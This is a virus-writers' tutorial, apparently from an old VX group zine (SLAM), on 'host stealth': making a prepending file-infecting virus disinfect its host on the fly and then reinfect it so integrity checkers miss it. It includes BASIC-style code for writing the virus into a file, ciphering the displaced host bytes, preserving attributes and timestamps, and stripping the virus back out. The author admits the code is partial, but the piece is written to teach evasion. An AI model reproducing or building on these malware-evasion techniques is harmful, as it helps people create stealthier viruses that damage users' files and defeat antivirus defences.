SLAM4.021: Host Stealth by Raid/SLAM
A method of stealth that all of my viruses use: On-the fly disinfection..
Also known as host-stealth...
Written by RAiD [SLAM]
Uhm...WTF is this?
This is a very simple tute (I'm bored as fucking hell, bare with me) on yet another method of stealthing your virus. Now, I must warn you, this method has several drawbacks..And, it requires the ability for your virus to be able to literaly restore the file (host) on disk exactly the way it was before you infected it. (If you can't do this, this tute wont be much help, since all code presented will be in asic.)
Hrm...ok, Im still reading..explain
This method of stealth is very old, and is still in use today. It's also in my opinion one of the easiest ways to do it. It does not offer anything but host-stealth, but..Theres ways to improve it, which I wont bother to explain. your probably wondering why the fuck you'd need host stealth anyway, your virus spreads, and it's not known, and if your an asm coder, its probably polymorphic as well. Think about this though, wouldn't you like to be able to infect those files that bitch when they detect a change? Well, this is where disinfecting yourself comes in handy. :-) And hell, fprot would make a damn good carrier wouldn't it? Well? ... So, to use this method of stealth (which is not full stealth), You need to make sure your virus is able to reverse itself, yes for this time, Your playing AV as well. Since in a way, your virus will have a built in Av program...Of sorts. <G> But if I make my virus remove itself, the file is clean, and the user doesn't see my work...Wrong!
After you have done whatever you wanted with the host in its clean state (running it for example) you can always put yourself back in.
Alright, fine...Show me code.
The code i'll show is snippits from viruses i've written, and no, its not in asm. In fact, theres not enough code in this doc to actually build a working virus from, theres just enough to explain how to do this stealth in it's simplest form.
the code is a sample from a prepender (this will give you the idea how this works, and for a prepender, this 'stealth' is required, else, we cant ever run the host)
First the source, then the explaination of what its doing...
infecting the host:
Lets_infect:
rem Lets put our virus into the file shall we? :)
gosub hide_host:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub cypher_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
gosub res_host:
return
You've probably seen alot of gosubs (consider these the equ of asm call statement). Where they pass control is not important, its the theory which is. :) what were doing in this case, is reading our virus from memory (a buffer) and inserting it into the host...Sounds simple right? it is. in our case, we know ahead of time how big our virus actually is, so naturally we know how much of the appended data to remove later. If your virus is variable size, you'll have to accomidate for this. If you dont, either the stealth wont work, or your virus will crash and burn. as you can see with our source, we are going to need to restore each and every single byte we change. (thats why were appending it to the end) for appending viruses, just keep a copy of the original bytes from the header with your virus, as you'll need to put those back later. In our source snippit, its also cyphering the host data, this is of course optional. Your virus doesn't have to bother, but..You might as well. :)
removing ourself:
done:
target=0
rem We're almost finished. Prepare the host for control passing.
filename$=hostname$
gosub hide_host:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub cypher_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
gosub res_host:
Here we did the opposite of above, we decrypted the data, put it back where it goes, and trimmed the data we put at the end off (You did remember how much you put on the end right?) Again, this source code is dependant on the virus size being known. if its variable and i can't stress this enough, you MUST compensate for it.
If you liked this doc, let me know..likewise if you didn't like it, let me know that too. :-) Don't bother emailing about the no asm examples, I told you in the beginning there wasn't any..<G>
Greetings: #virus, SLAM, 29a...etc...
Fuck You.: Retch, Martin Overton (chekmate...it still sucks)
Until next time,
RAiD [SLAM]